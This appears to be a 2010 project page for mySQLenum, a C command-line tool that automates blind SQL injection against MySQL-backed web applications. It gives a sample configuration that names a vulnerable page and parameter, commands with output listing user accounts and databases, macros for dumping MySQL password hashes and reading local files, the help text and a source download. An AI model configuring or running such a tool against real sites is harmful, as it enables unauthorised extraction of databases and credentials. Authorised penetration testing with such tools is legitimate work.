MySQLenum

Automatic blind sql injection tool.

Posted by Andrea Fabrizi on October 15, 2010

mySQLenum is a command line automatic blind sql injection tool for web applications which uses MySql server as its back-end database.

It’s written in pure C, doen’t has any dependency, is fast and support all recent MySQL versions.

The algorithm used for the enumeration was designed to reduce the requests number and limit the bandwidth usage.

Note that this project was only an experiment and it’s not maintained anymore.

Following an example mysqlenum.conf file.

Example:

#Server host
host = www.example.com

#Server port
port = 80

#Vulnerable page
page = /index.php

#HTTP method
#GET or POST (Default is GET)
httpmethod = GET

#Vulnerable parameter included the default value
#Example: vulnparam = id=9
#         vulnparam = name=hello'
#         vulnparam = code=ABC"
vulnparam = page_id=2

#String to match in the page when the query is valid (TRUE)
matchstring = Hello

#SQL query to execute
sqlquery = select user from accounts

…more options available

Operating modes

mySQLenum works in two ways:

  • Standard mode
  • Macro mode

Standard mode

In this mode mySQLenum enumerates a custom query, specified in the configuration file or using the command line option --sql-query.

$ ./mysqlenum --sql-query="select user from accounts"
mySQLenum 0.3
Copyright (C) 2009-2010 Andrea Fabrizi 

 Query: select user from accounts

 1)  admin 
 2)  local 
 3)  marco 
 4)  luca 
 5)  ---

 > Total requests: 192
 > Data sent: 63 Kb
 > Data received: 675 Kb

Macro mode

Using the Macro mode it is possible to automatically enumerate predefined queries. The information_schema must be accessible to execute the macros 1,2 and 3.

$ ./mysqlenum -m
mySQLenum 0.3
Copyright (C) 2009-2010 Andrea Fabrizi 

  Available macros:
    0) Test enumeration
    1) Databases enumeration
    2) Tables enumeration
    3) Fields enumeration
    4) MySQL Version
    5) Current User
    6) Current Database
    7) MySQL Users and password hashes
    8) View local file
    9) Data directory

  Your choice: 1

Databases:
 1)  information_schema 
 2)  security 
 3)  mysql 
 4)  phpmyadmin 
 5)  ---

 > Total requests: 361
 > Data sent: 136 Kb
 > Data received: 1275 Kb

Help

$ ./mysqlenum -h
mySQLenum 0.3
 usage: ./mysqlenum [OPTION...]

 OPTIONS:
   -c,   --config		 config file (default is mysqlenum.conf).
   -q,   --sql-query		 SQL Query to execute.
   -r,   --start-row		 starts the enumeration from this row (default is the  first row).
   -m,   --macro		 start macro mode.

         --no-spinner		 disable the spinner.
         --quiet		 quiet (no output).
   -h,   --help			 this help.
   -V,   --version		 display the version and exit.
   -v,   --verbose		 be verbose (-vvv for very verbose).

Changelog version 0.3:

  • Removed command line parameters
  • Added configuration file support
  • Added 7 new macros!
  • Inverse match support
  • Many new features!
  • Code clean

Download:

Source tarball mysqlenum-0.3.tar.gz